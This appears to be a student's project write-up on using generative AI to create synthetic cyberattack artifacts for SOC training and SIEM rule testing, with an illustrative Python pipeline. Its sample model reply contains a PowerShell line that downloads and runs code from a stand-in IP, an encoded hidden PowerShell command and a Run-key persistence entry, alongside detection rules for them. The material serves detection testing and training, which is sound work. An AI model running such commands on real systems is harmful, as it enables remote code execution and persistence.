In today’s dynamic threat landscape, organizations need more than static security policies: they need tools that reflect the complexity of real-world attacks. During my Master of Cybersecurity course, I led a student research project in collaboration with Retrospect Lab aimed at solving this very challenge.
Team Details (we were all third-semester students in the Master of Cyber Security at Swinburne University of Technology):
Student Team Lead: Rajan Kandel
Other Team Members
Academic Supervisor: Yasas Supeksala
Industry Supervisor: Dr. Rory Coulter
Project Duration: 4 Months (Feb – May 2024)
The Project – Brief Description
The Problem: Unrealistic, Manual Cyber Simulations
Cyber incident response has long relied on predefined attack scenarios, manual testing, or outdated simulation methods. While useful, these methods often suffer from:
Limited realism
Time-consuming setup
Lack of credible digital artifacts (the evidence attackers leave behind)
Simulating true-to-life cyber incidents is difficult without access to sensitive or real-world data—and this hinders training, detection development, and response testing.
Our Solution: AI-Powered Artifact Generation
To overcome this limitation, our team developed a framework that uses generative AI (ChatGPT) to simulate digital artifacts representing various types of cyberattacks. The framework is designed to support:
Endpoint attacks
Network-based intrusions
Phishing emails
IoT-based threats
Code injection and exploitation
We crafted structured prompts using curated data from:
CVE/NVD vulnerability databases
Real-world incident response blogs and threat reports
The AI then generated artifacts such as:
Registry modifications
Log entries (system, firewall, endpoint)
Malicious scripts and payloads
Obfuscated shellcode or attack fragments
Key Benefits
This AI-driven simulation framework brought multiple advantages:
Realism: Produces detailed, context-aware artifacts grounded in real-world threat intelligence. Generated artifacts should still be checked against the actual log, registry and script formats they imitate before they are used for detection testing, since a model can produce plausible-looking output that no real system would emit.
Scalability: Easily extended to support new attack vectors, platforms, and behaviors.
Accessibility: No specialized lab required—only a browser, an internet connection, and AI access.
It’s an ideal tool for:
Training SOC analysts and red/blue teams
Testing SIEM detection rules
Benchmarking and improving incident response workflows
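As an added example (not the project’s own code or prompt framework), the following Python script sketches the pipeline described above: a structured prompt built from a curated vulnerability record, a parser that accepts only artifacts matching a declared output schema, and a few SIEM-style detection rules run over the accepted artifacts. The record, the JSON schema, the validation patterns, the detection rules and the stand-in model reply are all constructed assumptions so the script runs offline; the CVE identifier is a placeholder, not a real advisory, and in a real run the prompt would be sent to the model and its reply passed to the parser.

```python
import json
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ThreatRecord:
    """Curated entry from a CVE/NVD record plus a mapped ATT&CK technique (assumed schema)."""
    cve_id: str
    summary: str
    technique: str   # ATT&CK technique ID
    platform: str


# Constructed sample record; the CVE ID is a placeholder, not a real advisory.
SAMPLE_RECORD = ThreatRecord(
    cve_id="CVE-0000-0000",
    summary="local privilege escalation via an unquoted service path",
    technique="T1547.001",
    platform="Windows 10 endpoint",
)

ARTIFACT_TYPES = ("registry", "log", "script")


def build_prompt(rec: ThreatRecord, artifact_types=ARTIFACT_TYPES) -> str:
    """Structured prompt: context from the record, then a strict output
    schema so the reply can be parsed rather than read by hand."""
    return (
        f"You are simulating the traces left by an attacker on a {rec.platform} "
        f"after exploiting {rec.cve_id} ({rec.summary}), "
        f"following MITRE ATT&CK technique {rec.technique}.\n"
        f"Produce one artifact of each type in {list(artifact_types)}.\n"
        "Reply with a JSON array only. Each element must be an object "
        '{"type": <artifact type>, "content": <string>}.\n'
        "Registry entries use the form KEY\\PATH\\VALUE = DATA; log lines start "
        "with an ISO-8601 timestamp; scripts are the raw script text."
    )


# Per-type validation patterns (hypothetical; tuned for this example only).
_VALIDATORS = {
    "registry": re.compile(r"^HK(LM|CU|CR|U|CC)\\[^=]+=\s*.+$"),
    "log": re.compile(r"^\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}"),
    "script": re.compile(r"\S"),
}


def parse_artifacts(reply: str):
    """Parse a model reply and return (accepted, rejected) so that output
    which does not match the schema is never silently used."""
    accepted, rejected = [], []
    for item in json.loads(reply):
        kind = item.get("type")
        content = item.get("content", "")
        pattern = _VALIDATORS.get(kind)
        if pattern and isinstance(content, str) and pattern.search(content):
            accepted.append({"type": kind, "content": content})
        else:
            rejected.append(item)
    return accepted, rejected


# Constructed stand-in for a generative AI reply; in a real run this string
# would come from the model. The last entry is deliberately malformed.
SAMPLE_REPLY = json.dumps([
    {"type": "registry",
     "content": r'HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater = "C:\Users\Public\updater.exe"'},
    {"type": "log",
     "content": "2024-03-14T10:22:05Z host=WS01 proc=powershell.exe cmd=\"powershell -nop -w hidden -enc SQBFAFgA\""},
    {"type": "script",
     "content": "$u='http://198.51.100.7/p';Invoke-Expression (New-Object Net.WebClient).DownloadString($u)"},
    {"type": "log", "content": "Suspicious process started"},  # no timestamp, so rejected
])

# Simple SIEM-style rules (constructed) to exercise the artifacts with.
DETECTION_RULES = {
    "persistence_run_key": ("registry", re.compile(r"\\CurrentVersion\\Run\\", re.I)),
    "encoded_powershell": ("log", re.compile(r"powershell(\.exe)?\b.*\s-enc\s", re.I)),
    "download_cradle": ("script", re.compile(r"DownloadString|Invoke-WebRequest|iwr\b", re.I)),
}


def run_detections(artifacts):
    """Return (rule_name, artifact_index) for every artifact a rule fires on."""
    hits = []
    for i, art in enumerate(artifacts):
        for name, (kind, pattern) in DETECTION_RULES.items():
            if art["type"] == kind and pattern.search(art["content"]):
                hits.append((name, i))
    return hits


def demo():
    prompt = build_prompt(SAMPLE_RECORD)
    accepted, rejected = parse_artifacts(SAMPLE_REPLY)
    return {"prompt": prompt, "accepted": accepted, "rejected": rejected,
            "hits": run_detections(accepted)}


if __name__ == "__main__":
    result = demo()
    print(result["prompt"])
    print(f"{len(result['accepted'])} artifacts accepted, {len(result['rejected'])} rejected")
    for name, idx in result["hits"]:
        print(f"rule {name} fired on artifact {idx} ({result['accepted'][idx]['type']})")
```

The point of the (accepted, rejected) split is that a detection rule which never fires tells you nothing if the artifact it was meant to catch was malformed in the first place; rejected output should be fed back into prompt refinement rather than dropped.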
Project Outcomes
Our prototype was successfully tested with Retrospect Lab, meeting the project’s key goals. It provided a flexible, testable system for producing synthetic threat artifacts.
Future enhancements include:
Automating prompt generation and data ingestion
Integration with platforms like Microsoft Sentinel, Splunk, or Elastic
Ranking AI outputs using ML models for realism and detection value
Final Thoughts and Product
This project showcases how AI can revolutionize cybersecurity readiness. By generating realistic cyber artifacts at scale, we help organizations prepare for tomorrow’s attacks today.
It’s a fusion of automation, intelligence, and innovation that has the potential to change how we train, detect, and respond in the face of ever-evolving cyber threats.
After the project, we developed a database of attack types, vectors, techniques, and tactics, along with a prompt framework that enables ChatGPT or any generative AI to produce realistic incident artifacts.